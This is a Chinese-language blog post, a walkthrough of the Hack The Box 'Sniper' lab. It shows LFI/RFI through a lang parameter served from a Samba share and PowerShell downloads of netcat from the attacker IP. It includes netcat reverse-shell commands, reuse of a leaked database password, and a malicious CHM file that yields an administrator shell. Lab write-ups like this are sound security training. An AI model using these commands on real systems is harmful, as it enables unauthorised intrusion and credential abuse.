

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="gscr10">
  <meta name="keywords" content="">
  <title>Hack the box: Sniper - ri0-__Hack the World</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      
        
        
        
      
      <link  rel="stylesheet" href="https://cdn.staticfile.org/prism/1.21.0/themes/prism-tomorrow.min.css" />
      
    
  

  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_pf9vaxs7x7b.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.2.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Mr. Military</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('https://w.wallhaven.cc/full/2e/wallhaven-2em38y.jpg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="container page-header text-center fade-in-up">
            <span class="h2" id="subtitle">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2020-09-22 20:35" pubdate>
        September 22, 2020 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      2.3k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      34
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto" id="post">
            <!-- SEO header -->
            <h1 style="display: none">Hack the box: Sniper</h1>
            
            <div class="markdown-body" id="post-body">
              <p><img src="https://p3.ssl.qhimg.com/t014580c5bb32d4ece8.png" srcset="/img/loading.gif"></p>
<h2 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h2><p><strong>- 关于Hack the box：</strong><a target="_blank" rel="noopener" href="https://www.hackthebox.eu/">Hack The Box</a>是一个全球知名的渗透测试靶机平台，在这个平台上，靶机区分为两种状态<code>active</code>、<code>retired</code>。对于<code>retired</code>状态的靶机，需要成为付费vip才能访问（£100/年或者£10/月）。</p>
<p><strong>- 关于Sniper lab：</strong>我在寻找测试靶机的过程中，发现Sniper在处于<code>retired</code>状态下依然可以访问，白嫖的感觉真香 =）。下图是对Sniper的简要介绍：</p>
<p><img src="https://p1.ssl.qhimg.com/t0144b24717475e936d.png" srcset="/img/loading.gif"></p>
<p><img src="https://p0.ssl.qhimg.com/t012807f73730007771.png" srcset="/img/loading.gif"></p>
<p><strong>- 渗透测试工具：</strong>kali、masscan、nmap、gobuster、samba、powershell、netcat</p>
<h2 id="0x02-信息收集"><a href="#0x02-信息收集" class="headerlink" title="0x02 信息收集"></a>0x02 信息收集</h2><p>连接hack the box 个人账户VPN，分配ip：10.10.14.67。</p>
<p>使用<code>masscan</code>对靶机Sniper的ip：10.10.10.151 进行扫描，发现开放端口80、135、139、445、49667：</p>
<pre class="language-shell" data-language="shell"><code class="language-shell">~ masscan -e tun0 -p1-65535,U:1-65535 10.10.10.151 --rate&#x3D;1000</code></pre>

<p><img src="https://p5.ssl.qhimg.com/t019cda3c6a4d431ddf.png" srcset="/img/loading.gif"></p>
<p>使用<code>nmap</code>收集对应端口的服务信息：</p>
<pre class="language-shell" data-language="shell"><code class="language-shell">~ nmap -n -v -Pn -p80,135,139,445,49667 -A --reason -oN nmap.txt 10.10.10.151</code></pre>

<p><img src="https://p5.ssl.qhimg.com/t01ff516230b63cfd5c.png" srcset="/img/loading.gif"></p>
<p>经过分析决定从http服务入手进行渗透。访问10.10.10.151，查看到主页：</p>
<p><img src="https://p5.ssl.qhimg.com/t01265bcba4e3ac0566.png" srcset="/img/loading.gif"></p>
<p>使用<code>gobuster</code>进行文件/目录枚举：</p>
<pre class="language-shell" data-language="shell"><code class="language-shell">~ .&#x2F;gobuster dir -w &#x2F;usr&#x2F;share&#x2F;dirbuster&#x2F;wordlists&#x2F;directory-list-lowercase-2.3-small.txt -t 20 -x php,html -u http:&#x2F;&#x2F;10.10.10.151&#x2F;

&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;
Gobuster v3.0.1
by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_)
&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;
[+] Url:            http:&#x2F;&#x2F;10.10.10.151&#x2F;
[+] Threads:        20
[+] Wordlist:       &#x2F;usr&#x2F;share&#x2F;dirbuster&#x2F;wordlists&#x2F;directory-list-lowercase-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster&#x2F;3.0.1
[+] Extensions:     html,php
[+] Timeout:        10s
&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;
2020&#x2F;03&#x2F;31 20:30:29 Starting gobuster
&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;
&#x2F;Blog (Status: 301)
&#x2F;Images (Status: 301)
&#x2F;Index.php (Status: 200)
&#x2F;blog (Status: 301)
&#x2F;css (Status: 301)
&#x2F;images (Status: 301)
&#x2F;index.php (Status: 200)
&#x2F;index.php (Status: 200)
&#x2F;js (Status: 301)
&#x2F;user (Status: 301)
&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;
2020&#x2F;03&#x2F;31 21:19:35 Finished
&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;</code></pre>

<p>通过枚举，发现/blog、/user等有用的信息：</p>
<p><img src="https://p0.ssl.qhimg.com/t01384d344c9d495d50.png" srcset="/img/loading.gif"></p>
<p><img src="https://p1.ssl.qhimg.com/t01b53ae09d26b3fbee.png" srcset="/img/loading.gif"></p>
<h2 id="0x03-文件包含漏洞"><a href="#0x03-文件包含漏洞" class="headerlink" title="0x03 文件包含漏洞"></a>0x03 文件包含漏洞</h2><p><strong>- 本地文件包含（Local File Inclusion）</strong></p>
<p>在检查blog页面时，发现<code>/blog?lang=***.php</code>，这种形式的GET请求，在参数处尝试文件包含漏洞是一个不错的选择：</p>
<p><img src="https://p0.ssl.qhimg.com/t014ab237e08c01167c.png" srcset="/img/loading.gif"></p>
<p><img src="https://p1.ssl.qhimg.com/t01b32f21c83e2300ab.png" srcset="/img/loading.gif"></p>
<p>尝试访问绝对路径下的<code>win.ini</code>信息：<code>http://10.10.10.151/blog?lang=/windows/win.ini</code>，成功读取到信息：</p>
<p><img src="https://p5.ssl.qhimg.com/t013fb5a5fe6b8ea582.png" srcset="/img/loading.gif"></p>
<p><strong>- 远程文件包含漏洞（Remote File Inclusion）</strong></p>
<p>由本地文件包含漏洞的思路出发，尝试远程文件包含漏洞，这里的思路是使用Samba服务建立公共共享。</p>
<p>配置<code>smb.conf</code>：</p>
<pre class="language-txt" data-language="txt"><code class="language-txt">...
[global]
workgroup &#x3D; WORKGROUP
server string &#x3D; Samba Server %v
netbios name &#x3D; kali
security &#x3D; user
map to guest &#x3D; bad user
name resolve order &#x3D; bcast host
dns proxy &#x3D; no
bind interfaces only &#x3D; yes

# add to the end
[evil]
   path &#x3D; &#x2F;home&#x2F;sniper
   writable &#x3D; yes
   guest ok &#x3D; yes
   guest only &#x3D; yes
   read only &#x3D; no
   create mode &#x3D; 0777
   directory mode &#x3D; 0777
   force user &#x3D; nobody</code></pre>

<p>构造<code>php.info</code>文件，并启动Samba服务，检测远程文件包含漏洞是否存在。经过检测，确实存在，成功读取到信息：</p>
<p><img src="https://p5.ssl.qhimg.com/t0152ca3cbd748d4cc5.png" srcset="/img/loading.gif"></p>
<p><img src="https://p3.ssl.qhimg.com/t01746962ef968ff3e9.png" srcset="/img/loading.gif"></p>
<h2 id="0x04-获取低级用户的shell"><a href="#0x04-获取低级用户的shell" class="headerlink" title="0x04 获取低级用户的shell"></a>0x04 获取低级用户的shell</h2><p>构造<code>cmd.php</code>、<code>evil.sh</code>，实现命令执行，并查看到当前用户名<code>iusr</code>：</p>
<p><img src="https://p4.ssl.qhimg.com/t014804465010e5f8b1.png" srcset="/img/loading.gif"></p>
<pre class="language-shell" data-language="shell"><code class="language-shell">~ .&#x2F;evil.sh whoami    
nt authority\iusr</code></pre>

<p>为了获得一个反向shell（reverse shell），需要使用<code>evil.sh</code>上传<code>netcat.exe</code>到靶机中。这里尝试了一些文件目录都没有成功，我猜测应该是<code>iusr</code>的权限问题。最终在<code>C:\windows\system32\spool\drivers\color\</code>目录中成功上传<code>2.exe</code>(netcat)：</p>
<pre class="language-none"><code class="language-none">~ .&#x2F;evil.sh &#39;powershell &#x2F;c iwr \\10.10.14.67&#x2F;evil&#x2F;nc64.exe -outf \windows\system32\spool\drivers\color\2.exe&#39;    

~.&#x2F;evil.sh &#39;dir \windows\system32\spool\drivers\color\&#39;                                                          
 Volume in drive C has no label.
 Volume Serial Number is 6A2B-2640

 Directory of C:\windows\system32\spool\drivers\color

03&#x2F;31&#x2F;2020  03:21 PM    &lt;DIR&gt;          .
03&#x2F;31&#x2F;2020  03:21 PM    &lt;DIR&gt;          ..
03&#x2F;31&#x2F;2020  03:21 PM            43,696 2.exe
09&#x2F;15&#x2F;2018  12:12 AM             1,058 D50.camp
09&#x2F;15&#x2F;2018  12:12 AM             1,079 D65.camp
09&#x2F;15&#x2F;2018  12:12 AM               797 Graphics.gmmp
09&#x2F;15&#x2F;2018  12:12 AM               838 MediaSim.gmmp
09&#x2F;15&#x2F;2018  12:12 AM               786 Photo.gmmp
09&#x2F;15&#x2F;2018  12:12 AM               822 Proofing.gmmp
09&#x2F;15&#x2F;2018  12:12 AM           218,103 RSWOP.icm
09&#x2F;15&#x2F;2018  12:12 AM             3,144 sRGB Color Space Profile.icm
09&#x2F;15&#x2F;2018  12:12 AM            17,155 wscRGB.cdmp
09&#x2F;15&#x2F;2018  12:12 AM             1,578 wsRGB.cdmp
              11 File(s)        289,056 bytes
               2 Dir(s)  17,876,930,560 bytes free</code></pre>

<p>kali监听1234端口，并建立反向shell连接，成功获取<code>iusr</code>的shell：</p>
<pre class="language-none"><code class="language-none">~ .&#x2F;evil.sh &#39;start \windows\system32\spool\drivers\color\2.exe 10.10.14.67 1234 -e cmd.exe&#39;</code></pre>

<p><img src="https://p5.ssl.qhimg.com/t018dd1a71f5ecc2e04.png" srcset="/img/loading.gif"></p>
<h2 id="0x05-提权——普通用户"><a href="#0x05-提权——普通用户" class="headerlink" title="0x05 提权——普通用户"></a>0x05 提权——普通用户</h2><p>利用<code>iusr</code>用户权限寻找有用的信息，发现靶机还有两个用户<code>Administrator</code>、<code>Chris</code>。在<code>C:\inetpub\wwwroot\user\db.php</code>中找到密码<code>36mEAhz/B8xQ~2VM</code>，我猜测这个应该就是<code>Chris</code>的密码：</p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token comment">// Enter your Host, username, password, database below.</span>
<span class="token comment">// I left password empty because i do not set password on localhost.</span>
<span class="token variable">$con</span> <span class="token operator">=</span> <span class="token function">mysqli_connect</span><span class="token punctuation">(</span><span class="token double-quoted-string string">"localhost"</span><span class="token punctuation">,</span><span class="token double-quoted-string string">"dbuser"</span><span class="token punctuation">,</span><span class="token double-quoted-string string">"36mEAhz/B8xQ~2VM"</span><span class="token punctuation">,</span><span class="token double-quoted-string string">"sniper"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token comment">// Check connection</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">mysqli_connect_errno</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
  <span class="token punctuation">&#123;</span>
  <span class="token keyword">echo</span> <span class="token double-quoted-string string">"Failed to connect to MySQL: "</span> <span class="token punctuation">.</span> <span class="token function">mysqli_connect_error</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token punctuation">&#125;</span>
<span class="token delimiter important">?></span></span></code></pre>

<p>查看<code>Chris</code>的相关权限，发现他具有远程执行powershell的权限：</p>
<p><img src="https://p2.ssl.qhimg.com/t01692336bc9e0c316d.png" srcset="/img/loading.gif"></p>
<p>进入powershell，配置<code>Chirs</code>认证信息：</p>
<pre class="language-powershell" data-language="powershell"><code class="language-powershell">> <span class="token variable">$pw</span> = <span class="token function">ConvertTo-SecureString</span> <span class="token string">'36mEAhz/B8xQ~2VM'</span> <span class="token operator">-</span>AsPlainText <span class="token operator">-</span>Force
> <span class="token variable">$cred</span> = <span class="token function">New-Object</span> System<span class="token punctuation">.</span>Management<span class="token punctuation">.</span>Automation<span class="token punctuation">.</span>PSCredential<span class="token punctuation">(</span><span class="token string">"snipe\chris"</span><span class="token punctuation">,</span> <span class="token variable">$pw</span><span class="token punctuation">)</span>
> <span class="token function">Enter-PSSession</span> <span class="token operator">-</span>ComputerName SNIPER <span class="token operator">-</span>Credential <span class="token variable">$cred</span></code></pre>

<p>kali监听4321段端口，成功获取<code>Chris</code>的反向shell：</p>
<pre class="language-powershell" data-language="powershell"><code class="language-powershell">> <span class="token function">Start-Process</span> <span class="token operator">-</span>FilePath <span class="token string">"\windows\system32\spool\drivers\color\2.exe"</span> <span class="token operator">-</span>ArgumentList <span class="token string">"10.10.14.67 4321 -e cmd.exe"</span> <span class="token operator">-</span>NoNewWindow</code></pre>

<p><img src="https://p4.ssl.qhimg.com/t01eb7a4043722217ff.png" srcset="/img/loading.gif"></p>
<p><strong>- 成功获得普通用户权限，拿到<code>user flag</code>:</strong></p>
<p><img src="https://p0.ssl.qhimg.com/t01197680466fc12bc6.png" srcset="/img/loading.gif"></p>
<h2 id="0x06-提权——超级用户"><a href="#0x06-提权——超级用户" class="headerlink" title="0x06 提权——超级用户"></a>0x06 提权——超级用户</h2><p>在利用<code>Chris</code>权限寻找有用信息的过程中，在<code>C:\Docs\</code>、<code>C:\Users\Chris\Downloads\</code>目录下发现<code>note.txt</code>、<code>instructions.chm</code>两个有意思的文件：</p>
<p><img src="https://p1.ssl.qhimg.com/t01d4342a8a1364e108.png" srcset="/img/loading.gif"></p>
<p><img src="https://p1.ssl.qhimg.com/t018036c5c6b19d0135.png" srcset="/img/loading.gif"></p>
<p>从<code>note.txt</code>的留言信息中可以推测，老板对Chris的工作很不满意，需要将某个说明文档放到<code>C:\Docs\</code>目录中。而<code>.chm</code>文件就是通过html文件编译形成的“帮助文档”，所以我推测<code>instructions.chm</code>应该就是老板口中需要放在<code>C:\Docs\</code>目录中的文档。但当我将<code>C:\Users\Chris\Downloads\</code>目录下的<code>instructions.chm</code>复制到<code>C:\Docs\</code>中时，发现一个奇怪的现象，<code>instructions.chm</code>会在短时间内奇怪的消失。</p>
<p><img src="https://p1.ssl.qhimg.com/t01af1e4ef21c0f672f.png" srcset="/img/loading.gif"></p>
<p>文档消失，或许是超级用户删除？让我感到这可能就是超级用户的漏洞点所在。为了利用这一疑点，首先需要构造一个恶意的<code>.chm</code>文件，包含需要执行的反向shell恶意代码，当超级用户对这个恶意文档有任何操作的时候，就能获取到超级用户的shell。</p>
<p>我在github上寻找如何构造恶意的<code>.chm</code>文件，在这里找到了可以借用的范本：<a target="_blank" rel="noopener" href="https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1">https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1</a> 。为了构造<code>.chm</code>恶意文件，还需要下载微软的<a target="_blank" rel="noopener" href="https://www.microsoft.com/en-us/download/confirmation.aspx?id=21138">HTML HELP Workshop</a>。</p>
<p>这里我在本地计算机中使用<code>powershell</code>，构造了一个名为<code>doc.chm</code>的恶意文件，<code>Payload &quot;C:\windows\system32\spool\drivers\color\2.exe -e powershell 10.10.14.67 8888&quot;</code>：</p>
<p><img src="https://p0.ssl.qhimg.com/t01d2b6096bb7125c05.png" srcset="/img/loading.gif"></p>
<p><img src="https://p1.ssl.qhimg.com/t01dd14e4b379cdc223.png" srcset="/img/loading.gif"></p>
<p>随后将<code>doc.chm</code>放入kali的samba共享目录中：</p>
<p><img src="https://p3.ssl.qhimg.com/t01ccde97607c96c3fd.png" srcset="/img/loading.gif"></p>
<p>kali监听8888端口，用<code>Chris</code>的权限进入<code>C:\Docs\</code>，从Samba共享目录中将<code>doc.chm</code>复制到当前目录，并命名为<code>instructions.chm</code>：</p>
<pre class="language-powershell" data-language="powershell"><code class="language-powershell"><span class="token function">PS</span> C:\Docs> <span class="token function">iwr</span> \\10<span class="token punctuation">.</span>10<span class="token punctuation">.</span>14<span class="token punctuation">.</span>67<span class="token operator">/</span>evil<span class="token operator">/</span>doc<span class="token punctuation">.</span>chm <span class="token operator">-</span>outf <span class="token punctuation">.</span>\instructions<span class="token punctuation">.</span>chm</code></pre>

<p>等待片刻，成功获取到超级用户的反向shell：</p>
<p><img src="https://p0.ssl.qhimg.com/t014ab2831a0b14f4cb.png" srcset="/img/loading.gif"></p>
<p><strong>- 成功获得超级用户权限，拿到<code> flag</code>:</strong></p>
<p><img src="https://p1.ssl.qhimg.com/t01d8daafa316484acd.png" srcset="/img/loading.gif"></p>
<h2 id="0x07-总结"><a href="#0x07-总结" class="headerlink" title="0x07 总结"></a>0x07 总结</h2><p>对Sniper靶机的渗透测试思路进行一个简单的总结：</p>
<ul>
<li><strong>- 信息收集：</strong>查看端口、服务状态，获取网站目录</li>
<li><strong>- 验证<code>LFI</code>和<code>RFI</code>漏洞</strong></li>
<li><strong>- 通过Samba服务利用<code>RFI</code>漏洞</strong>：获得iuser的shell</li>
<li><strong>- 搜寻获取<code>Chris</code>的用户凭证</strong></li>
<li><strong>- 使用<code>Chris</code>角色在powershell中执行命令，获得<code>Chris</code>的shell</strong>：拿到user flag</li>
<li><strong>- 构造恶意的<code>.chm</code>文件</strong>：包含反向shell的恶意代码</li>
<li><strong>- 将恶意文件放入指定目录，等待超级用户执行操作，获取超级用户的shell：</strong>拿到root flag</li>
</ul>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/htb/">htb</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/htb/">htb</a>
                    
                  </div>
                
              </div>
              
              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2020/09/22/Hack-the-box-Forset/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Hack the box: Forset</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/09/22/FLAWS-challenge/">
                        <span class="hidden-mobile">FLAWS challenge</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <div>
      <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a>
      <i class="iconfont icon-love"></i>
      <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener">
        <span>Fluid</span></a>
    </div>
    
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


    

    
  </div>
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/main.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  
    
  



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





  <script  src="https://cdn.staticfile.org/tocbot/4.11.1/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;

      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '#post-body',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        collapseDepth: 0,
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc').css('visibility', 'visible');
      }
    });
  </script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "Hack the box: Sniper&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
